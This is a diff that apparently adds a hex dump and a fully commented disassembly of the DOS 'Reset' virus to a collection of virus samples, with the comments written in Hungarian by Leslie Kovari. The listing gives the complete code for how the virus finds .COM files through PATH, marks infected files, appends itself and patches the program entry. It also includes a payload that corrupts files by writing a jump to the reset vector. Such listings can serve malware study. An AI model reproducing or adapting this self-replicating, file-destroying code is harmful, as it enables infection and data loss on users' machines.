114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
|
||||
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
|
||||
114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
|
||||
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
|
||||
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
|
||||
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
|
||||
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
|
||||
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
|
||||
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
|
||||
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
|
||||
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
|
||||
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
|
||||
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
|
||||
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
|
||||
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
|
||||
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
|
||||
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
|
||||
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
|
||||
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
|
||||
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
|
||||
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
|
||||
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
|
||||
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
|
||||
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
|
||||
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
|
||||
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
|
||||
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
|
||||
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
|
||||
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
|
||||
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
|
||||
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
|
||||
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
|
||||
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
|
||||
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
|
||||
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
|
||||
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
|
||||
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
|
||||
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
|
||||
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
|
||||
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
|
||||
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
|
||||
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.
|
||||
|
||||
|
|
@ -0,0 +1,571 @@
|
|||
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
|
||||
(41) 21-033
|
||||
|
||||
|
||||
|
||||
Unassemble list:
|
||||
|
||||
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
|
||||
114E:0103 49 DEC CX
|
||||
114E:0104 60 DB 60
|
||||
114E:0105 61 DB 61
|
||||
114E:0106 6D DB 6D
|
||||
114E:0107 206120 AND [BX+DI+20],AH
|
||||
114E:010A 52 PUSH DX
|
||||
114E:010B 65 DB 65
|
||||
114E:010C 7365 JNB 0173
|
||||
114E:010E 7420 JZ 0130
|
||||
114E:0110 56 PUSH SI
|
||||
114E:0111 49 DEC CX
|
||||
114E:0112 52 PUSH DX
|
||||
114E:0113 55 PUSH BP
|
||||
114E:0114 53 PUSH BX
|
||||
114E:0115 2124 AND [SI],SP
|
||||
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
|
||||
;program kezdete
|
||||
114E:011A B409 MOV AH,09
|
||||
114E:011C CD21 INT 21 ;uzenet kepernyore
|
||||
114E:011E B400 MOV AH,00
|
||||
114E:0120 CD20 INT 20 ;exit to DOS
|
||||
|
||||
114E:0122 51 PUSH CX ;stack-en marad
|
||||
|
||||
;a kovetkezo utasitas operandusat fertozeskor
|
||||
;allitja be, igy mindig a helyes cimre mutat
|
||||
|
||||
114E:0123 BA1B03 MOV DX,031B
|
||||
114E:0126 FC CLD ;elore
|
||||
114E:0127 8BF2 MOV SI,DX
|
||||
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
|
||||
114E:012D BF0001 MOV DI,0100 ;program eleje
|
||||
114E:0130 B90300 MOV CX,0003 ;3 byte
|
||||
114E:0133 F3 REPZ
|
||||
114E:0134 A4 MOVSB ;eredeti JMP 117
|
||||
;visszamasolasa
|
||||
114E:0135 8BF2 MOV SI,DX
|
||||
114E:0137 B430 MOV AH,30
|
||||
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
|
||||
114E:013B 3C00 CMP AL,00
|
||||
114E:013D 7503 JNZ 0142
|
||||
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
|
||||
;nem fertoz a virus s
|
||||
;futtatja az eredeti
|
||||
;programot
|
||||
114E:0142 06 PUSH ES
|
||||
114E:0143 B42F MOV AH,2F
|
||||
114E:0145 CD21 INT 21 ;DTA. lekerdezese
|
||||
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
|
||||
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
|
||||
114E:014F 07 POP ES
|
||||
|
||||
;DTA. beallitasa az ENTRY cimere /dir.-bol/
|
||||
;ide masolja a find first a file adatait
|
||||
|
||||
114E:0150 BA5F00 MOV DX,005F ;DX=037a
|
||||
114E:0153 90 NOP
|
||||
114E:0154 03D6 ADD DX,SI
|
||||
114E:0156 B41A MOV AH,1A
|
||||
114E:0158 CD21 INT 21 ;DTA. letrehozasa
|
||||
;037a-tol uj cimre
|
||||
114E:015A 06 PUSH ES
|
||||
114E:015B 56 PUSH SI
|
||||
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
|
||||
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
|
||||
;kovetkezo dir.-ra mu-
|
||||
;tatni
|
||||
114E:0163 5E POP SI
|
||||
114E:0164 56 PUSH SI
|
||||
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
|
||||
;stringet keresi a
|
||||
;kornyezetbe PATH
|
||||
114E:0169 AC LODSB ;AL=DS:[SI],SI++
|
||||
114E:016A B90080 MOV CX,8000 ;32 kbyte
|
||||
114E:016D F2 REPNZ
|
||||
114E:016E AE SCASB ;megkeresi a kovetke-
|
||||
;zo P betut
|
||||
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
|
||||
114E:0172 AC LODSB
|
||||
114E:0173 AE SCASB ;betunkent hasonlitja
|
||||
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
|
||||
;karakter /kov.betu/
|
||||
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
|
||||
;osszehasonlitja a tobbi
|
||||
;betut is
|
||||
114E:0178 5E POP SI
|
||||
114E:0179 07 POP ES ;ES:DI mutat az elso
|
||||
;PATH-ra
|
||||
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
|
||||
;spec. cimenek mentese
|
||||
;PATH mutato
|
||||
114E:017E 8BFE MOV DI,SI ;SI=031b
|
||||
114E:0180 81C71F00 ADD DI,001F ;DI=033a
|
||||
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
|
||||
;tat az adatokra
|
||||
114E:0186 81C61F00 ADD SI,001F ;SI=033a
|
||||
114E:018A 8BFE MOV DI,SI ;DI=033a
|
||||
114E:018C EB3A JMP 01C8
|
||||
|
||||
;A kovetkezo PATH-ban megadott aldirectoryt
|
||||
;File Path-ra masolja, igy a kovetkezo file-t
|
||||
;ebben az aldirectoryban keresi
|
||||
|
||||
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
|
||||
114E:0193 7503 JNZ 0198
|
||||
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
|
||||
114E:0198 1E PUSH DS
|
||||
114E:0199 56 PUSH SI
|
||||
114E:019A 26 ES:
|
||||
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
|
||||
114E:019F 8BFE MOV DI,SI ;DI=033a
|
||||
114E:01A1 26 ES:
|
||||
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
|
||||
;masolasa ha az aktualis
|
||||
;konyvtarban nem talalt
|
||||
;fertozheto file-t
|
||||
;a PATH= utanra mutat
|
||||
;az SI
|
||||
114E:01A6 81C71F00 ADD DI,001F
|
||||
114E:01AA AC LODSB ;beolvas a kornyezetbol
|
||||
;a 0029. byte-ot
|
||||
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
|
||||
114E:01AD 740A JZ 01B9 ;igen
|
||||
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
|
||||
;tobb
|
||||
114E:01B1 7403 JZ 01B6 ;igen
|
||||
114E:01B3 AA STOSB ;letarol 033a-tol
|
||||
114E:01B4 EBF4 JMP 01AA
|
||||
|
||||
114E:01B6 BE0000 MOV SI,0000
|
||||
114E:01B9 5B POP BX ;BX=regi SI BX mutat
|
||||
;az adatokra
|
||||
114E:01BA 1F POP DS
|
||||
114E:01BB 89B71600 MOV [BX+0016],SI
|
||||
|
||||
;a kovetkezo PATH-ban adott dir. mar atmasolva
|
||||
|
||||
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
|
||||
114E:01C3 7403 JZ 01C8 ;igen
|
||||
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
|
||||
|
||||
;egy aldir. kiertekelese, eloszor az aktualis, majd
|
||||
;a file path -ra masolt aldir. vegignezese, fertozes
|
||||
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
|
||||
;tat
|
||||
|
||||
;COM file keresese
|
||||
|
||||
114E:01C7 AA STOSB ;\ jel beirasa
|
||||
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
|
||||
;file nevet masolni,
|
||||
;az aldir. neve utan
|
||||
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
|
||||
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
|
||||
114E:01D2 B90600 MOV CX,0006
|
||||
114E:01D5 F3 REPZ
|
||||
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
|
||||
;a PATH= szoveg utan
|
||||
114E:01D7 8BF3 MOV SI,BX
|
||||
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
|
||||
;alltal foglalt teru-
|
||||
;letre
|
||||
114E:01DB BA1F00 MOV DX,001F
|
||||
114E:01DE 90 NOP
|
||||
114E:01DF 03D6 ADD DX,SI
|
||||
114E:01E1 B90300 MOV CX,0003
|
||||
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
|
||||
;resese, az it. aktivi-
|
||||
;zalasa utan felhozza a
|
||||
;filemeretet, attrib.ot
|
||||
;keletkezes datumat s
|
||||
;idejet is!
|
||||
114E:01E6 EB04 JMP 01EC ;vizsgalatra
|
||||
114E:01E8 B44F MOV AH,4F
|
||||
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
|
||||
;zes keresese
|
||||
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
|
||||
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
|
||||
;talal tobb COM file-t
|
||||
;mas aldirt keres
|
||||
;mar talalt COM file-t, az adataival az entry fel
|
||||
;van toltve, a file ellenorzese es fertozese
|
||||
;kovetkezik
|
||||
|
||||
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
|
||||
;SI=0390
|
||||
114E:01F4 241F AND AL,1F ;maszk 31 -el
|
||||
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
|
||||
;zott a file!
|
||||
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
|
||||
;file-t keresi
|
||||
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
|
||||
114E:0200 77E6 JA 01E8 ;ha > a file meret
|
||||
;64000 byte-nal
|
||||
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
|
||||
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
|
||||
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
|
||||
|
||||
;megvan a kivalasztott file
|
||||
;a file nevet a filespec utan kell masolni
|
||||
|
||||
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
|
||||
;PATH=*.COM
|
||||
114E:020E 81C67D00 ADD SI,007D ;SI=0398
|
||||
|
||||
114E:0212 AC LODSB ;atmasolja a filenevet
|
||||
;/megkeresett elso v.
|
||||
;x.edik bejegyzest/
|
||||
114E:0213 AA STOSB
|
||||
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
|
||||
;zaro nullaig masol
|
||||
114E:0216 75FA JNZ 0212 ;nem
|
||||
114E:0218 5E POP SI ;SI ujra az adatokra mu-
|
||||
;tat
|
||||
;a file egyes eredeti informacioinak megorzese
|
||||
;hogy a fertozese ne tunjon fel
|
||||
;minek a file ATTR. megegyszer lekerdezni?
|
||||
|
||||
114E:0219 B80043 MOV AX,4300
|
||||
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
|
||||
114E:021F 90 NOP
|
||||
114E:0220 03D6 ADD DX,SI ;DX=031b
|
||||
114E:0222 CD21 INT 21 ;attributum lekerdezese
|
||||
;7.6.5.4.3.2.1.0.
|
||||
;x x a d v s h r
|
||||
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
|
||||
114E:0228 B80143 MOV AX,4301
|
||||
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
|
||||
;ra valtoztatja
|
||||
114E:022F BA1F00 MOV DX,001F
|
||||
114E:0232 90 NOP
|
||||
114E:0233 03D6 ADD DX,SI ;DX=033a
|
||||
114E:0235 CD21 INT 21 ;attributum beallitasa
|
||||
|
||||
;file nyitasa
|
||||
|
||||
114E:0237 B8023D MOV AX,3D02
|
||||
114E:023A BA1F00 MOV DX,001F
|
||||
114E:023D 90 NOP
|
||||
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
|
||||
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
|
||||
114E:0242 7303 JNB 0247
|
||||
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
|
||||
;fertozes
|
||||
114E:0247 8BD8 MOV BX,AX ;handle
|
||||
|
||||
;a file idejenek lekerdezese de ez is megtalalhato az
|
||||
;ENTRY teruleten
|
||||
|
||||
114E:0249 B80057 MOV AX,5700
|
||||
114E:024C CD21 INT 21 ;file letrehozasi datum
|
||||
;es ido bekerese
|
||||
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
|
||||
DH-sec DL-1/100
|
||||
114E:0252 89940600 MOV [SI+0006],DX ;datum
|
||||
114E:0256 B42C MOV AH,2C
|
||||
114E:0258 CD21 INT 21 ;rendszerido bekerese
|
||||
|
||||
;annak eldontese hogy a filet tonkretegye-e
|
||||
;ha a masodperc 7 akkor tonkreteszi /aktualis/
|
||||
|
||||
114E:025A 80E607 AND DH,07 ;sec = 7 ?
|
||||
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
|
||||
|
||||
;file tonkretetele
|
||||
|
||||
114E:025F B440 MOV AH,40
|
||||
114E:0261 B90500 MOV CX,0005
|
||||
114E:0264 8BD6 MOV DX,SI ;reset
|
||||
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
|
||||
114E:026A CD21 INT 21 ;file elejere ir 5 byte
|
||||
;-ot a RESET re ugrast!
|
||||
114E:026C EB65 JMP 02D3
|
||||
|
||||
114E:026E 90 NOP
|
||||
|
||||
;fertozes
|
||||
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
|
||||
;lehessen
|
||||
|
||||
114E:026F B43F MOV AH,3F
|
||||
114E:0271 B90300 MOV CX,0003
|
||||
114E:0274 BA0A00 MOV DX,000A
|
||||
114E:0277 90 NOP
|
||||
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
|
||||
114E:027A CD21 INT 21 ;a program eredeti elso
|
||||
;3 byte-jat beolvassa
|
||||
114E:027C 7255 JB 02D3 ;ha hiba van
|
||||
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
|
||||
114E:0281 7550 JNZ 02D3 ;nem
|
||||
|
||||
;file vegere allas az uj cimek kiszamitasa
|
||||
|
||||
114E:0283 B80242 MOV AX,4202
|
||||
114E:0286 B90000 MOV CX,0000
|
||||
114E:0289 BA0000 MOV DX,0000
|
||||
114E:028C CD21 INT 21 ;file vegere pozicional
|
||||
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
|
||||
;nagyon lehet hiba!
|
||||
|
||||
;file elejere irando JMP operandus kiszamitasa
|
||||
|
||||
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
|
||||
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
|
||||
;utasitashoz amit a
|
||||
;file elejere fog irni
|
||||
;igy a JMP a file mos-
|
||||
;tani vege utani bytera
|
||||
;fog mutatni
|
||||
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
|
||||
|
||||
;az uj file-on beluli adatterulet cimenek ki-
|
||||
;szamitasa es beallitasa
|
||||
|
||||
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
|
||||
;adatteruletre mutat
|
||||
114E:029D 8BFE MOV DI,SI
|
||||
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
|
||||
;nak operandusanak
|
||||
;cime
|
||||
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
|
||||
;cimet
|
||||
|
||||
;file moge masolja magat
|
||||
;filemutato a file vegere mutat
|
||||
|
||||
114E:02A5 B440 MOV AH,40
|
||||
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
|
||||
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
|
||||
;mutat
|
||||
114E:02AC 81EAF901 SUB DX,01F9
|
||||
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
|
||||
;program a fertozendo
|
||||
;program moge irja
|
||||
114E:02B2 721F JB 02D3 ;hiba eseten
|
||||
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
|
||||
114E:02B7 751A JNZ 02D3 ;igen
|
||||
|
||||
;az elso 3 byte atallitasa, egy file
|
||||
;vegere mutato ugro utasitasra
|
||||
|
||||
114E:02B9 B80042 MOV AX,4200
|
||||
114E:02BC B90000 MOV CX,0000
|
||||
114E:02BF BA0000 MOV DX,0000
|
||||
114E:02C2 CD21 INT 21 ;file pointer a vegere
|
||||
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
|
||||
;het hiba!
|
||||
114E:02C6 B440 MOV AH,40
|
||||
114E:02C8 B90300 MOV CX,0003
|
||||
114E:02CB 8BD6 MOV DX,SI
|
||||
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
|
||||
;mutat
|
||||
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
|
||||
|
||||
;az eredeti ido -mar a fertozesjelzessel egyutt-
|
||||
;visszaallitasa
|
||||
|
||||
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
|
||||
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
|
||||
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
|
||||
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
|
||||
;jelzi hogy mar ferto-
|
||||
;zott egy file a SEC.
|
||||
;-et 31-re allitja a
|
||||
;file bejegyzesben
|
||||
; hour | min. | sec.
|
||||
;1111 1|111 111|0 0000
|
||||
114E:02E3 B80157 MOV AX,5701
|
||||
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
|
||||
|
||||
;file zarasa
|
||||
|
||||
114E:02E8 B43E MOV AH,3E
|
||||
114E:02EA CD21 INT 21 ;file zarasa
|
||||
|
||||
;eredeti attributum visszaallitasa
|
||||
|
||||
114E:02EC B80143 MOV AX,4301
|
||||
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
|
||||
114E:02F3 BA1F00 MOV DX,001F
|
||||
114E:02F6 90 NOP
|
||||
|
||||
;DTA. visszaallitasa az eredeti cimre
|
||||
|
||||
114E:02F7 03D6 ADD DX,SI
|
||||
114E:02F9 CD21 INT 21 ;file attr. beallitasa
|
||||
114E:02FB 1E PUSH DS
|
||||
114E:02FC B41A MOV AH,1A
|
||||
114E:02FE 8B940000 MOV DX,[SI+0000]
|
||||
114E:0302 8E9C0200 MOV DS,[SI+0002]
|
||||
114E:0306 CD21 INT 21 ;DTA. megadasa
|
||||
114E:0308 1F POP DS
|
||||
|
||||
;az eredeti program futtatasa
|
||||
|
||||
114E:0309 59 POP CX
|
||||
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
|
||||
114E:030C 33DB XOR BX,BX
|
||||
114E:030E 33D2 XOR DX,DX
|
||||
114E:0310 33F6 XOR SI,SI
|
||||
114E:0312 BF0001 MOV DI,0100
|
||||
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
|
||||
;hogy a RET elo tudja
|
||||
;venni es odaugrik
|
||||
114E:0316 33FF XOR DI,DI
|
||||
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
|
||||
;re, ott mar az eredeti
|
||||
;JMP 117 utasitas van,
|
||||
;igy vegrehajtodik az
|
||||
;eredeti prg.
|
||||
;SP- hogy minek ?
|
||||
114E:031B 800046 ADD BYTE PTR [BX+SI],46
|
||||
114E:031E 0D2001 OR AX,0120
|
||||
114E:0321 2100 AND [BX+SI],AX
|
||||
114E:0323 2000 AND [BX+SI],AL
|
||||
114E:0325 EB15 JMP 033C
|
||||
114E:0327 90 NOP
|
||||
114E:0328 E91F00 JMP 034A
|
||||
114E:032B 2A2E434F SUB CH,[4F43]
|
||||
114E:032F 4D DEC BP
|
||||
114E:0330 0028 ADD [BX+SI],CH
|
||||
114E:0332 004703 ADD [BX+03],AL
|
||||
114E:0335 50 PUSH AX
|
||||
114E:0336 41 INC CX
|
||||
114E:0337 54 PUSH SP
|
||||
114E:0338 48 DEC AX
|
||||
114E:0339 3D5245 CMP AX,4552
|
||||
114E:033C 53 PUSH BX
|
||||
114E:033D 45 INC BP
|
||||
114E:033E 54 PUSH SP
|
||||
114E:033F 2E CS:
|
||||
114E:0340 43 INC BX
|
||||
114E:0341 4F DEC DI
|
||||
114E:0342 4D DEC BP
|
||||
114E:0343 0000 ADD [BX+SI],AL
|
||||
114E:0345 0000 ADD [BX+SI],AL
|
||||
114E:0347 4D DEC BP
|
||||
114E:0348 004449 ADD [SI+49],AL
|
||||
114E:034B 54 PUSH SP
|
||||
114E:034C 2E CS:
|
||||
114E:034D 43 INC BX
|
||||
114E:034E 4F DEC DI
|
||||
114E:034F 4D DEC BP
|
||||
114E:0350 0000 ADD [BX+SI],AL
|
||||
114E:0352 2020 AND [BX+SI],AH
|
||||
114E:0354 2020 AND [BX+SI],AH
|
||||
114E:0356 2020 AND [BX+SI],AH
|
||||
114E:0358 2020 AND [BX+SI],AH
|
||||
114E:035A 2020 AND [BX+SI],AH
|
||||
114E:035C 2020 AND [BX+SI],AH
|
||||
114E:035E 2020 AND [BX+SI],AH
|
||||
114E:0360 2020 AND [BX+SI],AH
|
||||
114E:0362 2020 AND [BX+SI],AH
|
||||
114E:0364 2020 AND [BX+SI],AH
|
||||
114E:0366 2020 AND [BX+SI],AH
|
||||
114E:0368 2020 AND [BX+SI],AH
|
||||
114E:036A 2020 AND [BX+SI],AH
|
||||
114E:036C 2020 AND [BX+SI],AH
|
||||
114E:036E 2020 AND [BX+SI],AH
|
||||
114E:0370 2020 AND [BX+SI],AH
|
||||
114E:0372 2020 AND [BX+SI],AH
|
||||
114E:0374 2020 AND [BX+SI],AH
|
||||
114E:0376 2020 AND [BX+SI],AH
|
||||
114E:0378 2020 AND [BX+SI],AH
|
||||
114E:037A 013F ADD [BX],DI
|
||||
114E:037C 3F AAS
|
||||
114E:037D 3F AAS
|
||||
114E:037E 3F AAS
|
||||
114E:037F 3F AAS
|
||||
114E:0380 3F AAS
|
||||
114E:0381 3F AAS
|
||||
114E:0382 3F AAS
|
||||
114E:0383 43 INC BX
|
||||
114E:0384 4F DEC DI
|
||||
114E:0385 4D DEC BP
|
||||
114E:0386 0301 ADD AX,[BX+DI]
|
||||
114E:0388 0000 ADD [BX+SI],AL
|
||||
114E:038A 002E8B26 ADD [268B],CH
|
||||
114E:038E 68 DB 68
|
||||
114E:038F 2020 AND [BX+SI],AH
|
||||
114E:0391 0121 ADD [BX+DI],SP
|
||||
114E:0393 0022 ADD [BP+SI],AH
|
||||
114E:0395 0000 ADD [BX+SI],AL
|
||||
114E:0397 005245 ADD [BP+SI+45],DL
|
||||
114E:039A 53 PUSH BX
|
||||
114E:039B 45 INC BP
|
||||
114E:039C 54 PUSH SP
|
||||
114E:039D 2E CS:
|
||||
114E:039E 43 INC BX
|
||||
114E:039F 4F DEC DI
|
||||
114E:03A0 4D DEC BP
|
||||
114E:03A1 0000 ADD [BX+SI],AL
|
||||
114E:03A3 4D DEC BP
|
||||
114E:03A4 00EA ADD DL,CH
|
||||
114E:03A6 F0 LOCK
|
||||
114E:03A7 FF00 INC WORD PTR [BX+SI]
|
||||
114E:03A9 F0 LOCK
|
||||
114E:03AA 16 PUSH SS
|
||||
114E:03AB 7C14 JL 03C1
|
||||
|
||||
Dump list:
|
||||
|
||||
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
|
||||
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
|
||||
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
|
||||
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
|
||||
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
|
||||
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
|
||||
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
|
||||
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
|
||||
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
|
||||
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
|
||||
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
|
||||
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
|
||||
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
|
||||
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
|
||||
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
|
||||
